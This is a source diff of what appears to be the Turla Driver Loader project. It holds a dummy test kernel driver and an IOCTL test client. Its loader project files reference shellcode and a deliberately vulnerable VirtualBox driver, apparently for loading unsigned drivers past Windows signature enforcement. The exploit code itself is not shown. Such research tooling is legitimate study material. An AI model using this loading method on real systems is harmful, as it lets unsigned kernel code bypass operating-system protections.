<ClCompile Include="main.c" />
</ItemGroup>
<ItemGroup>
<ClInclude Include="main.h" />
</ItemGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
<ImportGroup Label="ExtensionTargets">
</ImportGroup>
</Project>

View File

@ -0,0 +1,31 @@
<?xml version="1.0" encoding="utf-8"?>
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<ItemGroup>
<Filter Include="Source Files">
<UniqueIdentifier>{4FC737F1-C7A5-4376-A066-2A32D752A2FF}</UniqueIdentifier>
<Extensions>cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx</Extensions>
</Filter>
<Filter Include="Header Files">
<UniqueIdentifier>{93995380-89BD-4b04-88EB-625FBE52EBFB}</UniqueIdentifier>
<Extensions>h;hpp;hxx;hm;inl;inc;xsd</Extensions>
</Filter>
<Filter Include="Resource Files">
<UniqueIdentifier>{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}</UniqueIdentifier>
<Extensions>rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms</Extensions>
</Filter>
<Filter Include="Driver Files">
<UniqueIdentifier>{8E41214B-6785-4CFE-B992-037D68949A14}</UniqueIdentifier>
<Extensions>inf;inv;inx;mof;mc;</Extensions>
</Filter>
</ItemGroup>
<ItemGroup>
<ClCompile Include="main.c">
<Filter>Source Files</Filter>
</ClCompile>
</ItemGroup>
<ItemGroup>
<ClInclude Include="main.h">
<Filter>Header Files</Filter>
</ClInclude>
</ItemGroup>
</Project>

View File

@ -0,0 +1,6 @@
<?xml version="1.0" encoding="utf-8"?>
<Project ToolsVersion="14.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
<SignMode>Off</SignMode>
</PropertyGroup>
</Project>

View File

@ -0,0 +1,296 @@
/*******************************************************************************
*
* (C) COPYRIGHT AUTHORS, 2016
*
* TITLE: MAIN.C
*
* VERSION: 1.00
*
* DATE: 29 Jan 2016
*
* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A
* PARTICULAR PURPOSE.
*
*******************************************************************************/
#include <ntddk.h>
#include "main.h"
#define DEBUGPRINT
/*
* DevioctlDispatch
*
* Purpose:
*
* IRP_MJ_DEVICE_CONTROL dispatch.
*
*/
NTSTATUS DevioctlDispatch(
_In_ struct _DEVICE_OBJECT *DeviceObject,
_Inout_ struct _IRP *Irp
)
{
NTSTATUS status = STATUS_SUCCESS;
ULONG bytesIO = 0;
PIO_STACK_LOCATION stack;
BOOLEAN condition = FALSE;
PINOUTPARAM rp, wp;
UNREFERENCED_PARAMETER(DeviceObject);
#ifdef DEBUGPRINT
DbgPrint("%s IRP_MJ_DEVICE_CONTROL", __FUNCTION__);
#endif
stack = IoGetCurrentIrpStackLocation(Irp);
do {
if (stack == NULL) {
status = STATUS_INTERNAL_ERROR;
break;
}
rp = (PINOUTPARAM)Irp->AssociatedIrp.SystemBuffer;
wp = (PINOUTPARAM)Irp->AssociatedIrp.SystemBuffer;
if (rp == NULL) {
status = STATUS_INVALID_PARAMETER;
break;
}
switch (stack->Parameters.DeviceIoControl.IoControlCode) {
case DUMMYDRV_REQUEST1:
#ifdef DEBUGPRINT
DbgPrint("%s DUMMYDRV_REQUEST1 hit", __FUNCTION__);
#endif
if (stack->Parameters.DeviceIoControl.InputBufferLength != sizeof(INOUT_PARAM)) {
status = STATUS_INVALID_PARAMETER;
break;
}
#ifdef DEBUGPRINT
DbgPrint("%s in params = %lx, %lx, %lx, %lx", __FUNCTION__,
rp->Param1, rp->Param2, rp->Param3, rp->Param4);
#endif
wp->Param1 = 11111111;
wp->Param2 = 22222222;
wp->Param3 = 33333333;
wp->Param4 = 44444444;
status = STATUS_SUCCESS;
bytesIO = sizeof(INOUT_PARAM);
break;
default:
#ifdef DEBUGPRINT
DbgPrint("%s hit with invalid IoControlCode", __FUNCTION__);
#endif
status = STATUS_INVALID_PARAMETER;
};
} while (condition);
Irp->IoStatus.Status = status;
Irp->IoStatus.Information = bytesIO;
IoCompleteRequest(Irp, IO_NO_INCREMENT);
return status;
}
/*
* UnsupportedDispatch
*
* Purpose:
*
* Unused IRP_MJ_* dispatch.
*
*/
NTSTATUS UnsupportedDispatch(
_In_ struct _DEVICE_OBJECT *DeviceObject,
_Inout_ struct _IRP *Irp
)
{
UNREFERENCED_PARAMETER(DeviceObject);
Irp->IoStatus.Status = STATUS_NOT_SUPPORTED;
IoCompleteRequest(Irp, IO_NO_INCREMENT);
return Irp->IoStatus.Status;
}
/*
* CreateDispatch
*
* Purpose:
*
* IRP_MJ_CREATE dispatch.
*
*/
NTSTATUS CreateDispatch(
_In_ struct _DEVICE_OBJECT *DeviceObject,
_Inout_ struct _IRP *Irp
)
{
UNREFERENCED_PARAMETER(DeviceObject);
#ifdef DEBUGPRINT
DbgPrint("%s Create", __FUNCTION__);
#endif
IoCompleteRequest(Irp, IO_NO_INCREMENT);
return Irp->IoStatus.Status;
}
/*
* CloseDispatch
*
* Purpose:
*
* IRP_MJ_CLOSE dispatch.
*
*/
NTSTATUS CloseDispatch(
_In_ struct _DEVICE_OBJECT *DeviceObject,
_Inout_ struct _IRP *Irp
)
{
UNREFERENCED_PARAMETER(DeviceObject);
#ifdef DEBUGPRINT
DbgPrint("%s Close", __FUNCTION__);
#endif
IoCompleteRequest(Irp, IO_NO_INCREMENT);
return Irp->IoStatus.Status;
}
VOID ListModules(
_In_ struct _DRIVER_OBJECT *DriverObject
)
{
PLIST_ENTRY entry0, entry1;
KLDR_DATA_TABLE_ENTRY *section = (KLDR_DATA_TABLE_ENTRY*)DriverObject->DriverSection;
if (section == NULL)
return;
entry0 = section->InLoadOrderLinks.Flink;
entry1 = entry0;
do {
section = (KLDR_DATA_TABLE_ENTRY*)CONTAINING_RECORD(entry1, KLDR_DATA_TABLE_ENTRY, InLoadOrderLinks);
DbgPrint("Section=%p, %wZ", section, section->BaseDllName);
entry1 = entry1->Flink;
} while (entry1 != entry0);
}
/*
* DriverInitialize
*
* Purpose:
*
* Driver main.
*
*/
NTSTATUS DriverInitialize(
_In_ struct _DRIVER_OBJECT *DriverObject,
_In_ PUNICODE_STRING RegistryPath
)
{
NTSTATUS status;
UNICODE_STRING SymLink, DevName/*, DrvRefName*/;
PDEVICE_OBJECT devobj;
ULONG t;
WCHAR szDevName[] = { L'\\', L'D', L'e', L'v', L'i', L'c', L'e', L'\\', L'T', L'D', L'L', L'D', 0 };
WCHAR szSymLink[] = { L'\\', L'D', L'o', L's', L'D', L'e', L'v', L'i', L'c', L'e', L's', L'\\', L'T', L'D', L'L', L'D', 0 };
// WCHAR szNullDrv[] = { L'\\', L'D', L'r', L'i', L'v', L'e', L'r', L'\\', L'N', L'u', L'l', L'l', 0 };
// PDRIVER_OBJECT driverObject;
//RegistryPath is NULL
UNREFERENCED_PARAMETER(RegistryPath);
#ifdef DEBUGPRINT
DbgPrint("%s", __FUNCTION__);
#endif
RtlInitUnicodeString(&DevName, szDevName);
status = IoCreateDevice(DriverObject, 0, &DevName, FILE_DEVICE_UNKNOWN, FILE_DEVICE_SECURE_OPEN, TRUE, &devobj);
#ifdef DEBUGPRINT
DbgPrint("%s IoCreateDevice(%wZ) = %lx", __FUNCTION__, DevName, status);
#endif
if (!NT_SUCCESS(status)) {
return status;
}
RtlInitUnicodeString(&SymLink, szSymLink);
status = IoCreateSymbolicLink(&SymLink, &DevName);
#ifdef DEBUGPRINT
DbgPrint("%s IoCreateSymbolicLink(%wZ) = %lx", __FUNCTION__, SymLink, status);
#endif
devobj->Flags |= DO_BUFFERED_IO;
for (t = 0; t <= IRP_MJ_MAXIMUM_FUNCTION; t++)
DriverObject->MajorFunction[t] = &UnsupportedDispatch;
DriverObject->MajorFunction[IRP_MJ_DEVICE_CONTROL] = &DevioctlDispatch;
DriverObject->MajorFunction[IRP_MJ_CREATE] = &CreateDispatch;
DriverObject->MajorFunction[IRP_MJ_CLOSE] = &CloseDispatch;
DriverObject->DriverUnload = NULL; //nonstandard way of driver loading, no unload
devobj->Flags &= ~DO_DEVICE_INITIALIZING;
/*
RtlInitUnicodeString(&DrvRefName, szNullDrv);
if (NT_SUCCESS(ObReferenceObjectByName(&DrvRefName, OBJ_CASE_INSENSITIVE, NULL, 0,
*IoDriverObjectType, KernelMode, NULL, &driverObject)))
{
DbgPrint("drvObj %p", driverObject);
ListModules(driverObject);
ObDereferenceObject(driverObject);
}
*/
return status;
}
/*
* DriverEntry
*
* Purpose:
*
* Driver base entry point.
*
*/
NTSTATUS DriverEntry(
_In_ struct _DRIVER_OBJECT *DriverObject,
_In_ PUNICODE_STRING RegistryPath
)
{
NTSTATUS status;
UNICODE_STRING drvName;
WCHAR szDrvName[] = { L'\\', L'D', L'r', L'i', L'v', L'e', L'r', L'\\', L'T', L'D', L'L', L'D', 0 };
/* This parameters are invalid due to nonstandard way of loading and should not be used. */
UNREFERENCED_PARAMETER(DriverObject);
UNREFERENCED_PARAMETER(RegistryPath);
#ifdef DEBUGPRINT
DbgPrint("%s", __FUNCTION__);
#endif
RtlInitUnicodeString(&drvName, szDrvName);
status = IoCreateDriver(&drvName, &DriverInitialize);
#ifdef DEBUGPRINT
DbgPrint("%s IoCreateDriver(%wZ) = %lx", __FUNCTION__, drvName, status);
#endif
return status;
}

View File

@ -0,0 +1,112 @@
/*******************************************************************************
*
* (C) COPYRIGHT AUTHORS, 2016
*
* TITLE: MAIN.H
*
* VERSION: 1.00
*
* DATE: 29 Jan 2016
*
* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A
* PARTICULAR PURPOSE.
*
*******************************************************************************/
#pragma once
NTKERNELAPI
NTSTATUS
IoCreateDriver(
IN PUNICODE_STRING DriverName, OPTIONAL
IN PDRIVER_INITIALIZE InitializationFunction
);
NTKERNELAPI
NTSTATUS
ObReferenceObjectByName(
__in PUNICODE_STRING ObjectName,
__in ULONG Attributes,
__in_opt PACCESS_STATE AccessState,
__in_opt ACCESS_MASK DesiredAccess,
__in POBJECT_TYPE ObjectType,
__in KPROCESSOR_MODE AccessMode,
__inout_opt PVOID ParseContext,
__out PVOID *Object
);
extern POBJECT_TYPE *IoDriverObjectType;
_Dispatch_type_(IRP_MJ_DEVICE_CONTROL)
DRIVER_DISPATCH DevioctlDispatch;
_Dispatch_type_(IRP_MJ_CREATE)
DRIVER_DISPATCH CreateDispatch;
_Dispatch_type_(IRP_MJ_CLOSE)
DRIVER_DISPATCH CloseDispatch;
_Dispatch_type_(IRP_MJ_CREATE)
_Dispatch_type_(IRP_MJ_CREATE_NAMED_PIPE)
_Dispatch_type_(IRP_MJ_CLOSE)
_Dispatch_type_(IRP_MJ_READ)
_Dispatch_type_(IRP_MJ_WRITE)
_Dispatch_type_(IRP_MJ_QUERY_INFORMATION)
_Dispatch_type_(IRP_MJ_SET_INFORMATION)
_Dispatch_type_(IRP_MJ_QUERY_EA)
_Dispatch_type_(IRP_MJ_SET_EA)
_Dispatch_type_(IRP_MJ_FLUSH_BUFFERS)
_Dispatch_type_(IRP_MJ_QUERY_VOLUME_INFORMATION)
_Dispatch_type_(IRP_MJ_SET_VOLUME_INFORMATION)
_Dispatch_type_(IRP_MJ_DIRECTORY_CONTROL)
_Dispatch_type_(IRP_MJ_FILE_SYSTEM_CONTROL)
_Dispatch_type_(IRP_MJ_DEVICE_CONTROL)
_Dispatch_type_(IRP_MJ_INTERNAL_DEVICE_CONTROL)
_Dispatch_type_(IRP_MJ_SHUTDOWN)
_Dispatch_type_(IRP_MJ_LOCK_CONTROL)
_Dispatch_type_(IRP_MJ_CLEANUP)
_Dispatch_type_(IRP_MJ_CREATE_MAILSLOT)
_Dispatch_type_(IRP_MJ_QUERY_SECURITY)
_Dispatch_type_(IRP_MJ_SET_SECURITY)
_Dispatch_type_(IRP_MJ_POWER)
_Dispatch_type_(IRP_MJ_SYSTEM_CONTROL)
_Dispatch_type_(IRP_MJ_DEVICE_CHANGE)
_Dispatch_type_(IRP_MJ_QUERY_QUOTA)
_Dispatch_type_(IRP_MJ_SET_QUOTA)
_Dispatch_type_(IRP_MJ_PNP)
DRIVER_DISPATCH UnsupportedDispatch;
DRIVER_INITIALIZE DriverInitialize;
DRIVER_INITIALIZE DriverEntry;
#pragma alloc_text(INIT, DriverEntry)
#define DUMMYDRV_REQUEST1 CTL_CODE(FILE_DEVICE_UNKNOWN, 0x0701, METHOD_BUFFERED, FILE_SPECIAL_ACCESS)
typedef struct _INOUT_PARAM {
ULONG Param1;
ULONG Param2;
ULONG Param3;
ULONG Param4;
} INOUT_PARAM, *PINOUTPARAM;
typedef struct _KLDR_DATA_TABLE_ENTRY {
LIST_ENTRY InLoadOrderLinks;
PVOID ExceptionTable;
ULONG ExceptionTableSize;
// ULONG padding on IA64
PVOID GpValue;
PVOID NonPagedDebugInfo;
PVOID DllBase;
PVOID EntryPoint;
ULONG SizeOfImage;
UNICODE_STRING FullDllName;
UNICODE_STRING BaseDllName;
ULONG Flags;
USHORT LoadCount;
USHORT __Unused5;
PVOID SectionPointer;
ULONG CheckSum;
// ULONG padding on IA64
PVOID LoadedImports;
PVOID PatchInformation;
} KLDR_DATA_TABLE_ENTRY, *PKLDR_DATA_TABLE_ENTRY;

View File

@ -0,0 +1,34 @@
typedef struct _INOUT_PARAM{
ULONG Param1;
ULONG Param2;
ULONG Param3;
ULONG Param4;
} INOUT_PARAM, *PINOUT_PARAM;
#define DUMMYDRV_REQUEST1 CTL_CODE(FILE_DEVICE_UNKNOWN, 0x0701, METHOD_BUFFERED, FILE_SPECIAL_ACCESS)
VOID test(
VOID
)
{
HANDLE h;
INOUT_PARAM tmp;
DWORD bytesIO;
h = CreateFile(TEXT("\\\\.\\TDLD"), GENERIC_READ | GENERIC_WRITE,
FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING, 0, NULL);
if (h != INVALID_HANDLE_VALUE) {
tmp.Param1 = 0xAAAAAAAA;
tmp.Param2 = 0xBBBBBBBB;
tmp.Param3 = 0xCCCCCCCC;
tmp.Param4 = 0xDDDDDDDD;
DeviceIoControl(h, DUMMYDRV_REQUEST1,
&tmp, sizeof(tmp), &tmp,
sizeof(tmp), &bytesIO, NULL);
CloseHandle(h);
}
}

View File

@ -0,0 +1,22 @@

Microsoft Visual Studio Solution File, Format Version 12.00
# Visual Studio 14
VisualStudioVersion = 14.0.24720.0
MinimumVisualStudioVersion = 10.0.40219.1
Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "Furutaka", "Furutaka.vcxproj", "{8CC15B84-9FA8-4F5E-934F-7DAE7BAC4896}"
EndProject
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
Debug|x64 = Debug|x64
Release|x64 = Release|x64
EndGlobalSection
GlobalSection(ProjectConfigurationPlatforms) = postSolution
{8CC15B84-9FA8-4F5E-934F-7DAE7BAC4896}.Debug|x64.ActiveCfg = Debug|x64
{8CC15B84-9FA8-4F5E-934F-7DAE7BAC4896}.Debug|x64.Build.0 = Debug|x64
{8CC15B84-9FA8-4F5E-934F-7DAE7BAC4896}.Release|x64.ActiveCfg = Release|x64
{8CC15B84-9FA8-4F5E-934F-7DAE7BAC4896}.Release|x64.Build.0 = Release|x64
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE
EndGlobalSection
EndGlobal

View File

@ -0,0 +1,217 @@
<?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" ToolsVersion="14.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<ItemGroup Label="ProjectConfigurations">
<ProjectConfiguration Include="Debug|Win32">
<Configuration>Debug</Configuration>
<Platform>Win32</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Release|Win32">
<Configuration>Release</Configuration>
<Platform>Win32</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Debug|x64">
<Configuration>Debug</Configuration>
<Platform>x64</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Release|x64">
<Configuration>Release</Configuration>
<Platform>x64</Platform>
</ProjectConfiguration>
</ItemGroup>
<PropertyGroup Label="Globals">
<ProjectGuid>{8CC15B84-9FA8-4F5E-934F-7DAE7BAC4896}</ProjectGuid>
<Keyword>Win32Proj</Keyword>
<RootNamespace>Furutaka</RootNamespace>
<WindowsTargetPlatformVersion>8.1</WindowsTargetPlatformVersion>
<ProjectName>Furutaka</ProjectName>
</PropertyGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
<ConfigurationType>Application</ConfigurationType>
<UseDebugLibraries>true</UseDebugLibraries>
<PlatformToolset>v140</PlatformToolset>
<CharacterSet>Unicode</CharacterSet>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
<ConfigurationType>Application</ConfigurationType>
<UseDebugLibraries>false</UseDebugLibraries>
<PlatformToolset>v140</PlatformToolset>
<WholeProgramOptimization>true</WholeProgramOptimization>
<CharacterSet>Unicode</CharacterSet>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
<ConfigurationType>Application</ConfigurationType>
<UseDebugLibraries>true</UseDebugLibraries>
<PlatformToolset>v140</PlatformToolset>
<CharacterSet>Unicode</CharacterSet>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
<ConfigurationType>Application</ConfigurationType>
<UseDebugLibraries>false</UseDebugLibraries>
<PlatformToolset>v140</PlatformToolset>
<WholeProgramOptimization>true</WholeProgramOptimization>
<CharacterSet>Unicode</CharacterSet>
</PropertyGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
<ImportGroup Label="ExtensionSettings">
</ImportGroup>
<ImportGroup Label="Shared">
</ImportGroup>
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<PropertyGroup Label="UserMacros" />
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
<LinkIncremental>true</LinkIncremental>
<OutDir>.\output\$(Platform)\$(Configuration)\</OutDir>
<IntDir>.\output\$(Platform)\$(Configuration)\</IntDir>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
<LinkIncremental>true</LinkIncremental>
<OutDir>.\output\$(Platform)\$(Configuration)\</OutDir>
<IntDir>.\output\$(Platform)\$(Configuration)\</IntDir>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<LinkIncremental>false</LinkIncremental>
<OutDir>.\output\$(Platform)\$(Configuration)\</OutDir>
<IntDir>.\output\$(Platform)\$(Configuration)\</IntDir>
<CodeAnalysisRuleSet>AllRules.ruleset</CodeAnalysisRuleSet>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
<LinkIncremental>false</LinkIncremental>
<OutDir>.\output\$(Platform)\$(Configuration)\</OutDir>
<IntDir>.\output\$(Platform)\$(Configuration)\</IntDir>
<CodeAnalysisRuleSet>NativeRecommendedRules.ruleset</CodeAnalysisRuleSet>
<RunCodeAnalysis>false</RunCodeAnalysis>
</PropertyGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
<ClCompile>
<PrecompiledHeader>
</PrecompiledHeader>
<WarningLevel>Level4</WarningLevel>
<Optimization>Disabled</Optimization>
<PreprocessorDefinitions>WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<SDLCheck>true</SDLCheck>
<CompileAs>CompileAsC</CompileAs>
</ClCompile>
<Link>
<SubSystem>Console</SubSystem>
<GenerateDebugInformation>true</GenerateDebugInformation>
<EntryPointSymbol>TDLMain</EntryPointSymbol>
<UACExecutionLevel>RequireAdministrator</UACExecutionLevel>
</Link>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
<ClCompile>
<PrecompiledHeader>
</PrecompiledHeader>
<WarningLevel>Level4</WarningLevel>
<Optimization>Disabled</Optimization>
<PreprocessorDefinitions>_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<SDLCheck>true</SDLCheck>
<CompileAs>CompileAsC</CompileAs>
</ClCompile>
<Link>
<SubSystem>Console</SubSystem>
<GenerateDebugInformation>true</GenerateDebugInformation>
<EntryPointSymbol>TDLMain</EntryPointSymbol>
<UACExecutionLevel>RequireAdministrator</UACExecutionLevel>
</Link>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<ClCompile>
<WarningLevel>Level4</WarningLevel>
<PrecompiledHeader>
</PrecompiledHeader>
<Optimization>MaxSpeed</Optimization>
<FunctionLevelLinking>true</FunctionLevelLinking>
<IntrinsicFunctions>true</IntrinsicFunctions>
<PreprocessorDefinitions>WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<SDLCheck>true</SDLCheck>
<CompileAs>CompileAsC</CompileAs>
<MultiProcessorCompilation>true</MultiProcessorCompilation>
</ClCompile>
<Link>
<SubSystem>Console</SubSystem>
<EnableCOMDATFolding>true</EnableCOMDATFolding>
<OptimizeReferences>true</OptimizeReferences>
<GenerateDebugInformation>true</GenerateDebugInformation>
<EntryPointSymbol>TDLMain</EntryPointSymbol>
<SetChecksum>true</SetChecksum>
<UACExecutionLevel>RequireAdministrator</UACExecutionLevel>
</Link>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
<ClCompile>
<WarningLevel>Level4</WarningLevel>
<PrecompiledHeader>
</PrecompiledHeader>
<Optimization>MaxSpeed</Optimization>
<FunctionLevelLinking>true</FunctionLevelLinking>
<IntrinsicFunctions>true</IntrinsicFunctions>
<PreprocessorDefinitions>NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<SDLCheck>true</SDLCheck>
<CompileAs>CompileAsC</CompileAs>
<MultiProcessorCompilation>true</MultiProcessorCompilation>
<StringPooling>true</StringPooling>
<EnablePREfast>false</EnablePREfast>
</ClCompile>
<Link>
<SubSystem>Console</SubSystem>
<EnableCOMDATFolding>true</EnableCOMDATFolding>
<OptimizeReferences>true</OptimizeReferences>
<GenerateDebugInformation>true</GenerateDebugInformation>
<EntryPointSymbol>TDLMain</EntryPointSymbol>
<SetChecksum>true</SetChecksum>
<UACExecutionLevel>RequireAdministrator</UACExecutionLevel>
</Link>
</ItemDefinitionGroup>
<ItemGroup>
<ClCompile Include="cui.c" />
<ClCompile Include="instdrv.c" />
<ClCompile Include="main.c" />
<ClCompile Include="minirtl\cmdline.c" />
<ClCompile Include="minirtl\u64tohex.c" />
<ClCompile Include="minirtl\u64tostr.c" />
<ClCompile Include="minirtl\ultohex.c" />
<ClCompile Include="minirtl\ultostr.c" />
<ClCompile Include="minirtl\_strcat.c" />
<ClCompile Include="minirtl\_strcmpi.c" />
<ClCompile Include="minirtl\_strcpy.c" />
<ClCompile Include="minirtl\_strend.c" />
<ClCompile Include="minirtl\_strlen.c" />
<ClCompile Include="minirtl\_strncmpi.c" />
<ClCompile Include="sup.c" />
</ItemGroup>
<ItemGroup>
<ClInclude Include="cui.h" />
<ClInclude Include="global.h" />
<ClInclude Include="instdrv.h" />
<ClInclude Include="minirtl\cmdline.h" />
<ClInclude Include="minirtl\minirtl.h" />
<ClInclude Include="minirtl\rtltypes.h" />
<ClInclude Include="ntos.h" />
<ClInclude Include="resource.h" />
<ClInclude Include="shellcode.h" />
<ClInclude Include="sup.h" />
<ClInclude Include="vbox.h" />
</ItemGroup>
<ItemGroup>
<ResourceCompile Include="resource.rc" />
</ItemGroup>
<ItemGroup>
<None Include="drv\vboxdrv_exploitable.sys" />
</ItemGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
<ImportGroup Label="ExtensionTargets">
</ImportGroup>
</Project>

View File

@ -0,0 +1,110 @@
<?xml version="1.0" encoding="utf-8"?>
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<ItemGroup>
<Filter Include="Source Files">
<UniqueIdentifier>{4FC737F1-C7A5-4376-A066-2A32D752A2FF}</UniqueIdentifier>
<Extensions>cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx</Extensions>
</Filter>
<Filter Include="Header Files">
<UniqueIdentifier>{93995380-89BD-4b04-88EB-625FBE52EBFB}</UniqueIdentifier>
<Extensions>h;hh;hpp;hxx;hm;inl;inc;xsd</Extensions>
</Filter>
<Filter Include="Resource Files">
<UniqueIdentifier>{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}</UniqueIdentifier>
<Extensions>rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms</Extensions>
</Filter>
<Filter Include="minirtl">
<UniqueIdentifier>{b42df48e-a336-4e0e-9516-5a3ed47473ce}</UniqueIdentifier>
</Filter>
</ItemGroup>
<ItemGroup>
<ClCompile Include="main.c">
<Filter>Source Files</Filter>
</ClCompile>
<ClCompile Include="minirtl\_strcat.c">
<Filter>minirtl</Filter>
</ClCompile>
<ClCompile Include="minirtl\_strcmpi.c">
<Filter>minirtl</Filter>
</ClCompile>
<ClCompile Include="minirtl\_strcpy.c">
<Filter>minirtl</Filter>
</ClCompile>
<ClCompile Include="minirtl\_strend.c">
<Filter>minirtl</Filter>
</ClCompile>
<ClCompile Include="minirtl\_strlen.c">
<Filter>minirtl</Filter>
</ClCompile>
<ClCompile Include="minirtl\_strncmpi.c">
<Filter>minirtl</Filter>
</ClCompile>
<ClCompile Include="minirtl\cmdline.c">
<Filter>minirtl</Filter>
</ClCompile>
<ClCompile Include="minirtl\u64tohex.c">
<Filter>minirtl</Filter>
</ClCompile>
<ClCompile Include="minirtl\u64tostr.c">
<Filter>minirtl</Filter>
</ClCompile>
<ClCompile Include="minirtl\ultohex.c">
<Filter>minirtl</Filter>
</ClCompile>
<ClCompile Include="minirtl\ultostr.c">
<Filter>minirtl</Filter>
</ClCompile>
<ClCompile Include="sup.c">
<Filter>Source Files</Filter>
</ClCompile>
<ClCompile Include="cui.c">
<Filter>Source Files</Filter>
</ClCompile>
<ClCompile Include="instdrv.c">
<Filter>Source Files</Filter>
</ClCompile>
</ItemGroup>
<ItemGroup>
<ClInclude Include="global.h">
<Filter>Header Files</Filter>
</ClInclude>
<ClInclude Include="ntos.h">
<Filter>Header Files</Filter>
</ClInclude>
<ClInclude Include="minirtl\cmdline.h">
<Filter>minirtl</Filter>
</ClInclude>
<ClInclude Include="minirtl\minirtl.h">
<Filter>minirtl</Filter>
</ClInclude>
<ClInclude Include="minirtl\rtltypes.h">
<Filter>minirtl</Filter>
</ClInclude>
<ClInclude Include="vbox.h">
<Filter>Header Files</Filter>
</ClInclude>
<ClInclude Include="shellcode.h">
<Filter>Header Files</Filter>
</ClInclude>
<ClInclude Include="resource.h">
<Filter>Header Files</Filter>
</ClInclude>
<ClInclude Include="sup.h">
<Filter>Header Files</Filter>
</ClInclude>
<ClInclude Include="cui.h">
<Filter>Header Files</Filter>
</ClInclude>
<ClInclude Include="instdrv.h">
<Filter>Header Files</Filter>
</ClInclude>
</ItemGroup>
<ItemGroup>
<ResourceCompile Include="resource.rc">
<Filter>Resource Files</Filter>
</ResourceCompile>
</ItemGroup>
<ItemGroup>
<None Include="drv\vboxdrv_exploitable.sys" />
</ItemGroup>
</Project>

View File

@ -0,0 +1,19 @@
<?xml version="1.0" encoding="utf-8"?>
<Project ToolsVersion="14.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
<LocalDebuggerCommandArguments>C:\MAKEEXE\TurlaDriverLoader\Loader\drv\Tsugumi.sys</LocalDebuggerCommandArguments>
